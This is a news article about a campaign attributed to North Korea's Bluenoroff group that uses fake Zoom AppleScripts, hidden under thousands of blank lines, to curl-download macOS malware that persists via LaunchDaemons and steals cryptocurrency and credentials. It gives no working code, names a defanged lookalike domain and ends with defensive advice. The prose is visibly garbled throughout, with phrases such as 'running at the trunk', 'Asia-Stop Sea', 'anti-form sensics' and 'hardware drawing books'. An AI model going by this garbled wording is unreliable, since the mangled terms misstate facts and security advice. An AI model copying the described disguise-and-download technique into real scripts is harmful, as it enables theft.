- Fake zoom scripts launch malware hidden under thousands of code lines and whitespace
- Launchdaemons Make sure malware is running at the trunk with administrator privileges once they are installed
- Malicious components are disguised as legitimate tools such as “iCloud_helper” and “Wi-Fi Updater”
A new cyber campaign that uses false zoom applications is aimed at organizations in North America, Europe and Asia-Stop Sea, experts have warned.
This cyber campaign, associated with North Korean hackers, is attributed to the Bluenoroff group, a well -known associated with the notorious Lazarus group, and Spoof’s legitimate video conference services from Zoom to fool victims.
Primarily focused on gaming, entertainment and fintech sectors, this operation occurs carefully coordinated and aims to compromise cryptocurrency and other sensitive financial data.
How the attack works
The operation begins with a misleading AppleScript, designed to look like it is performing routine zoom SDK maintenance.
Analysts have found the manuscript padded with about 10,000 empty lines to hide the malicious commands buried deep inside.
These commands found on lines 10.017 and 10.018, use a curl request to silently download malware from a counterfeit domain: ZOOM-TECH[.]us.
Once installed, Malware is embedded in the system using Launchdaemon configurations that perform the malicious payload at start -up with elevated privileges.
Additional components are then retrieved from compromised infrastructure and disguised as normal macOS tools such as “iCloud_helper” and “Wi-Fi update.”
These components erase traces of temporary files and staging folders using anti-form sensics methods to avoid detection while maintaining back door access for remote commands and data theft.
This method benefits from the regular work-from-home scenario, where technical errors are resolved quickly and often with minimal control.
Malware goes beyond simple identification theft. It is actively looking for cryptocurrency —teThe book extensions, browser login and approval keys, which confirms Bluenoroff’s ongoing focus on financial gain.
In a documented case, a Canadian online gaming company was targeted on May 28, when attackers used fake zoom -fault finding scripts to plant malware.
To remain in safety, check zoom meeting participants independently, block suspicious domains and use endpoint protection because attackers are now using reliable platforms and well -known workflows to slip past basic protection.
It is also important to choose the best antivirus and ransomware protection software, especially for organizations with digital assets or crypto teams.
Companies should adopt the protection of identity theft to monitor exposed data and credentials, educate staff at social engineering risks and secure cryptocurrency tools with hardware drawing books.
Via Cybersecuritynews
